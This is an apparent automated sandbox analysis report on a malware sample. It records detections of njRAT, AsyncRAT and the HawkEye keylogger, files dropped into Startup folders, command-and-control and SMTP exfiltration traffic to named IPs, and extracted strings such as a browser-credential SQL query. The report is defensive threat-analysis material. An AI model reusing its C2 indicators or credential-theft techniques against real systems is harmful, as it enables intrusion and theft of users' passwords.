            Source: Yara matchFile source: 0.3.wscript.exe.1b8660a7cb0.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.pgr.exe.80000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.0.pgr.exe.80000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.servieda.exe.a0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.0.servieda.exe.a0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.Tmp.exe.1d0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 8.0.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack, type: UNPACKEDPE
            Machine Learning detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Local\Temp\Tmp.exeJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exeJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Local\Temp\pgr.exeJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exeJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Roaming\servieda.exeJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeJoe Sandbox ML: detected
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exeJoe Sandbox ML: detected
            Source: 13.2.tmpFB21.tmp.exe.8a0000.0.unpackAvira: Label: TR/AD.MExecute.lzrac
            Source: 13.2.tmpFB21.tmp.exe.8a0000.0.unpackAvira: Label: SPR/Tool.MailPassView.473
            Source: 13.0.tmpFB21.tmp.exe.8a0000.0.unpackAvira: Label: TR/AD.MExecute.lzrac
            Source: 13.0.tmpFB21.tmp.exe.8a0000.0.unpackAvira: Label: SPR/Tool.MailPassView.473
            Source: 1.0.Tmp.exe.1d0000.0.unpackAvira: Label: TR/Dropper.Gen
            Source: 2.2.pgr.exe.80000.0.unpackAvira: Label: TR/Dropper.Gen7
            Source: 2.0.pgr.exe.80000.0.unpackAvira: Label: TR/Dropper.Gen7
            Source: 3.0.servieda.exe.a0000.0.unpackAvira: Label: TR/Dropper.Gen
            Source: 2.2.pgr.exe.3a3fd88.3.unpackAvira: Label: TR/Inject.vcoldi
            Source: 8.0.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpackAvira: Label: TR/Dropper.Gen

            Compliance:

            barindex
            Detected unpacking (overwrites its own PE header)Show sources
            Source: C:\Users\user\AppData\Local\Temp\Tmp.exeUnpacked PE file: 1.2.Tmp.exe.1d0000.0.unpack
            Source: C:\Users\user\AppData\Roaming\servieda.exeUnpacked PE file: 3.2.servieda.exe.a0000.0.unpack
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exeUnpacked PE file: 8.2.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack
            Source: C:\Users\user\AppData\Local\Temp\Tmp.exeFile opened: C:\Windows\WinSxS\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_88df21dd2faf7c49\MSVCR80.dll
            Source: unknownHTTPS traffic detected: 207.241.227.114:443 -> 192.168.2.6:49699 version: TLS 1.2
            Source: Binary string: C:\Users\Jovan\Documents\Visual Studio 2010\Projects\Stealer\CMemoryExecute\CMemoryExecute\obj\Release\CMemoryExecute.pdb source: pgr.exe, 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, tmpFB21.tmp.exe, tmpFB21.tmp.exe.2.dr
            Source: Binary string: f:\Projects\VS2005\mailpv\Release\mailpv.pdb source: pgr.exe, 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, tmpFB21.tmp.exe, vbc.exe, tmpFB21.tmp.exe.2.dr
            Source: Binary string: f:\Projects\VS2005\WebBrowserPassView\Release\WebBrowserPassView.pdb source: pgr.exe, 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, tmpFB21.tmp.exe, vbc.exe, 0000000F.00000002.518251485.0000000000400000.00000040.00000001.sdmp, tmpFB21.tmp.exe.2.dr
            Source: Binary string: mscorrc.pdb source: tmpFB21.tmp.exe, 0000000D.00000002.613320606.00000000058C0000.00000002.00000001.sdmp
            Source: pgr.exe, 00000002.00000002.608644673.00000000028C1000.00000004.00000001.sdmpBinary or memory string: autorun.inf
            Source: pgr.exe, 00000002.00000002.608644673.00000000028C1000.00000004.00000001.sdmpBinary or memory string: [autorun]
            Source: tmpFB21.tmp.exeBinary or memory string: [autorun]
            Source: tmpFB21.tmp.exeBinary or memory string: autorun.inf
            Source: tmpFB21.tmp.exe.2.drBinary or memory string: autorun.inf
            Source: tmpFB21.tmp.exe.2.drBinary or memory string: [autorun]
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 14_2_00406EC3 FindFirstFileA,FindNextFileA,strlen,strlen,
            Source: C:\Users\user\AppData\Local\Temp\Tmp.exeCode function: 4x nop then dec eax
            Source: C:\Users\user\AppData\Roaming\servieda.exeCode function: 4x nop then dec eax
            Source: C:\Users\user\AppData\Roaming\servieda.exeCode function: 4x nop then mov eax, dword ptr [ebp+00000128h]
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exeCode function: 4x nop then dec eax
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeCode function: 4x nop then jmp 02C91A73h
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeCode function: 4x nop then jmp 02C91A73h
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeCode function: 4x nop then lea esp, dword ptr [ebp-0Ch]
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeCode function: 4x nop then mov esp, ebp

            Networking:

            barindex
            Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
            Source: TrafficSnort IDS: 2021176 ET TROJAN Bladabindi/njRAT CnC Command (ll) 192.168.2.6:49706 -> 185.140.53.71:3429
            Source: TrafficSnort IDS: 2019214 ET TROJAN njrat ver 0.7d Malware CnC Callback (Capture) 192.168.2.6:49706 -> 185.140.53.71:3429
            Source: TrafficSnort IDS: 2022062 ET TROJAN njrat ver 0.7d Malware CnC Callback Response (File Manager) 185.140.53.71:3429 -> 192.168.2.6:49706
            Source: TrafficSnort IDS: 2019216 ET TROJAN njrat ver 0.7d Malware CnC Callback (Message) 192.168.2.6:49706 -> 185.140.53.71:3429
            Source: TrafficSnort IDS: 2030673 ET TROJAN Observed Malicious SSL Cert (AsyncRAT Server) 185.140.53.71:5622 -> 192.168.2.6:49715
            Source: TrafficSnort IDS: 2019926 ET TROJAN HawkEye Keylogger Report SMTP 192.168.2.6:49726 -> 103.6.196.196:587
            Source: TrafficSnort IDS: 2019926 ET TROJAN HawkEye Keylogger Report SMTP 192.168.2.6:49732 -> 103.6.196.196:587
            C2 URLs / IPs found in malware configurationShow sources
            Source: Malware configuration extractorURLs: 185.140.53.71
            Connects to many ports of the same IP (likely port scanning)Show sources
            Source: global trafficTCP traffic: 185.140.53.71 ports 5471,1,4,5,7,5622,3429
            May check the online IP address of the machineShow sources
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeDNS query: name: whatismyipaddress.com
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeDNS query: name: whatismyipaddress.com
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeDNS query: name: whatismyipaddress.com
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeDNS query: name: whatismyipaddress.com
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeDNS query: name: whatismyipaddress.com
            Source: global trafficTCP traffic: 192.168.2.6:49705 -> 185.140.53.71:5471
            Source: global trafficTCP traffic: 192.168.2.6:49726 -> 103.6.196.196:587
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comConnection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 104.16.154.36 104.16.154.36
            Source: Joe Sandbox ViewASN Name: EXABYTES-AS-APExaBytesNetworkSdnBhdMY EXABYTES-AS-APExaBytesNetworkSdnBhdMY
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: global trafficTCP traffic: 192.168.2.6:49726 -> 103.6.196.196:587
            Source: unknownTCP traffic detected without corresponding DNS query: 185.140.53.71
            Source: unknownTCP traffic detected without corresponding DNS query: 185.140.53.71
            Source: unknownTCP traffic detected without corresponding DNS query: 185.140.53.71
            Source: unknownTCP traffic detected without corresponding DNS query: 185.140.53.71
            Source: unknownTCP traffic detected without corresponding DNS query: 185.140.53.71
            Source: unknownTCP traffic detected without corresponding DNS query: 185.140.53.71
            Source: unknownTCP traffic detected without corresponding DNS query: 185.140.53.71
            Source: unknownTCP traffic detected without corresponding DNS query: 185.140.53.71
            Source: unknownTCP traffic detected without corresponding DNS query: 185.140.53.71
            Source: unknownTCP traffic detected without corresponding DNS query: 185.140.53.71
            Source: unknownTCP traffic detected without corresponding DNS query: 185.140.53.71
            Source: unknownTCP traffic detected without corresponding DNS query: 185.140.53.71
            Source: unknownTCP traffic detected without corresponding DNS query: 185.140.53.71
            Source: unknownTCP traffic detected without corresponding DNS query: 185.140.53.71
            Source: unknownTCP traffic detected without corresponding DNS query: 185.140.53.71
            Source: unknownTCP traffic detected without corresponding DNS query: 185.140.53.71
            Source: unknownTCP traffic detected without corresponding DNS query: 185.140.53.71
            Source: unknownTCP traffic detected without corresponding DNS query: 185.140.53.71
            Source: unknownTCP traffic detected without corresponding DNS query: 185.140.53.71
            Source: unknownTCP traffic detected without corresponding DNS query: 185.140.53.71
            Source: unknownTCP traffic detected without corresponding DNS query: 185.140.53.71
            Source: unknownTCP traffic detected without corresponding DNS query: 185.140.53.71
            Source: unknownTCP traffic detected without corresponding DNS query: 185.140.53.71
            Source: unknownTCP traffic detected without corresponding DNS query: 185.140.53.71
            Source: unknownTCP traffic detected without corresponding DNS query: 185.140.53.71
            Source: unknownTCP traffic detected without corresponding DNS query: 185.140.53.71
            Source: unknownTCP traffic detected without corresponding DNS query: 185.140.53.71
            Source: unknownTCP traffic detected without corresponding DNS query: 185.140.53.71
            Source: unknownTCP traffic detected without corresponding DNS query: 185.140.53.71
            Source: unknownTCP traffic detected without corresponding DNS query: 185.140.53.71
            Source: unknownTCP traffic detected without corresponding DNS query: 185.140.53.71
            Source: unknownTCP traffic detected without corresponding DNS query: 185.140.53.71
            Source: unknownTCP traffic detected without corresponding DNS query: 185.140.53.71
            Source: unknownTCP traffic detected without corresponding DNS query: 185.140.53.71
            Source: unknownTCP traffic detected without corresponding DNS query: 185.140.53.71
            Source: unknownTCP traffic detected without corresponding DNS query: 185.140.53.71
            Source: unknownTCP traffic detected without corresponding DNS query: 185.140.53.71
            Source: unknownTCP traffic detected without corresponding DNS query: 185.140.53.71
            Source: unknownTCP traffic detected without corresponding DNS query: 185.140.53.71
            Source: unknownTCP traffic detected without corresponding DNS query: 185.140.53.71
            Source: unknownTCP traffic detected without corresponding DNS query: 185.140.53.71
            Source: unknownTCP traffic detected without corresponding DNS query: 185.140.53.71
            Source: unknownTCP traffic detected without corresponding DNS query: 185.140.53.71
            Source: unknownTCP traffic detected without corresponding DNS query: 185.140.53.71
            Source: unknownTCP traffic detected without corresponding DNS query: 185.140.53.71
            Source: unknownTCP traffic detected without corresponding DNS query: 185.140.53.71
            Source: unknownTCP traffic detected without corresponding DNS query: 185.140.53.71
            Source: unknownTCP traffic detected without corresponding DNS query: 185.140.53.71
            Source: unknownTCP traffic detected without corresponding DNS query: 185.140.53.71
            Source: unknownTCP traffic detected without corresponding DNS query: 185.140.53.71
            Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exeCode function: 13_2_0101A09A recv,
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: whatismyipaddress.comConnection: Keep-Alive
            Source: pgr.exe, 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, tmpFB21.tmp.exe, 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp, vbc.exe, 0000000F.00000002.518251485.0000000000400000.00000040.00000001.sdmp, tmpFB21.tmp.exe.2.drString found in binary or memory: @nss3.dllSOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe%programfiles%\Sea MonkeySOFTWARE\Mozillamozilla%s\binPathToExe%programfiles%\Mozilla FirefoxSELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins.---signons.txtsignons2.txtsignons3.txtsignons.sqlitenetmsg.dllUnknown Error\Error %d: %seditkernel32.dll... open %2.2X %s (%s)Microsoft_WinInetMicrosoft_WinInet_u7@dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
            Source: pgr.exe, 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, tmpFB21.tmp.exe, 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp, vbc.exe, 0000000F.00000002.518251485.0000000000400000.00000040.00000001.sdmp, tmpFB21.tmp.exe.2.drString found in binary or memory: @nss3.dllSOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe%programfiles%\Sea MonkeySOFTWARE\Mozillamozilla%s\binPathToExe%programfiles%\Mozilla FirefoxSELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins.---signons.txtsignons2.txtsignons3.txtsignons.sqlitenetmsg.dllUnknown Error\Error %d: %seditkernel32.dll... open %2.2X %s (%s)Microsoft_WinInetMicrosoft_WinInet_u7@dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
            Source: vbc.exe, 0000000F.00000003.518065717.000000000094E000.00000004.00000001.sdmpString found in binary or memory: dataindex%3Dempty%26defaultbrowser%3D0?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7859736938632;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=9774759596232;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=9774759596232;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
            Source: vbc.exe, 0000000F.00000003.518065717.000000000094E000.00000004.00000001.sdmpString found in binary or memory: dataindex%3Dempty%26defaultbrowser%3D0?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7859736938632;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=9774759596232;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=9774759596232;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
            Source: tmpFB21.tmp.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
            Source: vbc.exe, 0000000F.00000003.517790333.000000000094C000.00000004.00000001.sdmpString found in binary or memory: s://www.google.com/chrome/https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0https://www.google.com/chrome/thank-you.htmlabout:blankhttps://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://go.microsoft.com/fwlink/?LinkId=517287https://go.microsoft.com/fwlink/https://go.microsoft.com/fwlink/?LinkId=838604https://go.microsoft.com/fwlink/p/?LinkId=255141https://go.microsoft.com/fwlink/p/https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=7&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.phphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=199&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1https://contextual.media.net/medianet.phphttps://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=348&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=2&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttp://www.msn.com/?ocid=iehphttp://www.msn.com/http://www.msn.com/de-ch/?ocid=iehphttp://www.msn.com/de-ch/https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://www.microsoft.com/en-us/welcomeie11/https://www.microsoft.com/en-us/edge?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edgehttps://www.microsoft.com/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/edge/https://www.microsoft.com/en-us/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edge/http://go.microsoft.com/fwlink/?LinkId=838604http://go.microsoft.com/fwlink/http://go.microsoft.com/fwlink/p/?LinkId=255141http://go.microsoft.com/fwlink/p/res://C:\Windows\system32\mmcndmgr.dll/views.htmhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7859736938632;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7859736938632;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2
            Source: vbc.exe, 0000000F.00000003.517790333.000000000094C000.00000004.00000001.sdmpString found in binary or memory: s://www.google.com/chrome/https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0https://www.google.com/chrome/thank-you.htmlabout:blankhttps://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://go.microsoft.com/fwlink/?LinkId=517287https://go.microsoft.com/fwlink/https://go.microsoft.com/fwlink/?LinkId=838604https://go.microsoft.com/fwlink/p/?LinkId=255141https://go.microsoft.com/fwlink/p/https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=7&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.phphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=199&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1https://contextual.media.net/medianet.phphttps://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=348&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=2&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttp://www.msn.com/?ocid=iehphttp://www.msn.com/http://www.msn.com/de-ch/?ocid=iehphttp://www.msn.com/de-ch/https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://www.microsoft.com/en-us/welcomeie11/https://www.microsoft.com/en-us/edge?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edgehttps://www.microsoft.com/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/edge/https://www.microsoft.com/en-us/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edge/http://go.microsoft.com/fwlink/?LinkId=838604http://go.microsoft.com/fwlink/http://go.microsoft.com/fwlink/p/?LinkId=255141http://go.microsoft.com/fwlink/p/res://C:\Windows\system32\mmcndmgr.dll/views.htmhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7859736938632;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7859736938632;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2
            Source: unknownDNS traffic detected: queries for: ia601504.us.archive.org
            Source: wscript.exe, 00000000.00000003.342698689.000001B8665BF000.00000004.00000001.sdmpString found in binary or memory: http://certificates.godaddy.com/repository/0
            Source: wscript.exe, 00000000.00000003.342698689.000001B8665BF000.00000004.00000001.sdmpString found in binary or memory: http://certificates.godaddy.com/repository/gdig2.crt0
            Source: wscript.exe, 00000000.00000003.342698689.000001B8665BF000.00000004.00000001.sdmpString found in binary or memory: http://certs.godaddy.com/repository/1301
            Source: pgr.exe, 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, tmpFB21.tmp.exe, 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp, tmpFB21.tmp.exe.2.drString found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
            Source: wscript.exe, 00000000.00000003.340516433.000001B8665AF000.00000004.00000001.sdmpString found in binary or memory: http://crl.g
            Source: tmp87E4.tmp.exe, 0000000C.00000002.610844081.000000000506F000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: wscript.exe, 00000000.00000003.342698689.000001B8665BF000.00000004.00000001.sdmpString found in binary or memory: http://crl.godaddy.com/gdig2s1-1597.crl0
            Source: wscript.exe, 00000000.00000003.339839120.000001B8665BF000.00000004.00000001.sdmpString found in binary or memory: http://crl.godaddy.com/gdroot-g2.crl0=w
            Source: wscript.exe, 00000000.00000003.342698689.000001B8665BF000.00000004.00000001.sdmpString found in binary or memory: http://crl.godaddy.com/gdroot-g2.crl0F
            Source: wscript.exe, 00000000.00000003.342698689.000001B8665BF000.00000004.00000001.sdmpString found in binary or memory: http://crl.godaddy.com/gdroot.crl0F
            Source: tmp87E4.tmp.exe, 0000000C.00000002.610746899.0000000005046000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
            Source: 77EC63BDA74BD0D0E0426DC8F8008506.12.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
            Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
            Source: tmpFB21.tmp.exe, 0000000D.00000003.493276632.0000000005AA3000.00000004.00000001.sdmpString found in binary or memory: http://fontfabrik.com;
            Source: pgr.exe, 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, tmpFB21.tmp.exe, 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp, tmpFB21.tmp.exe.2.drString found in binary or memory: http://ocsp.comodoca.com0
            Source: wscript.exe, 00000000.00000003.342698689.000001B8665BF000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.godaddy.com/0
            Source: wscript.exe, 00000000.00000003.342698689.000001B8665BF000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.godaddy.com/02
            Source: wscript.exe, 00000000.00000003.342698689.000001B8665BF000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.godaddy.com/05
            Source: tmp87E4.tmp.exe, 0000000C.00000002.601243946.0000000002AF1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: tmpFB21.tmp.exeString found in binary or memory: http://whatismyipaddress.com/
            Source: pgr.exe, 00000002.00000002.608644673.00000000028C1000.00000004.00000001.sdmp, tmpFB21.tmp.exe, 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp, tmpFB21.tmp.exe.2.drString found in binary or memory: http://whatismyipaddress.com/-
            Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: tmpFB21.tmp.exe, 0000000D.00000003.495103820.0000000005AA3000.00000004.00000001.sdmp, tmpFB21.tmp.exe, 0000000D.00000003.495080605.0000000005AB2000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.com
            Source: tmpFB21.tmp.exe, 0000000D.00000003.495080605.0000000005AB2000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.com-E
            Source: tmpFB21.tmp.exe, 0000000D.00000003.495080605.0000000005AB2000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.com;
            Source: tmpFB21.tmp.exe, 0000000D.00000003.495103820.0000000005AA3000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comMP_
            Source: tmpFB21.tmp.exe, 0000000D.00000003.495103820.0000000005AA3000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comafet6
            Source: tmpFB21.tmp.exe, 0000000D.00000003.495080605.0000000005AB2000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comal
            Source: tmpFB21.tmp.exe, 0000000D.00000003.495080605.0000000005AB2000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comfacb
            Source: tmpFB21.tmp.exe, 0000000D.00000003.495080605.0000000005AB2000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.comhly#
            Source: tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
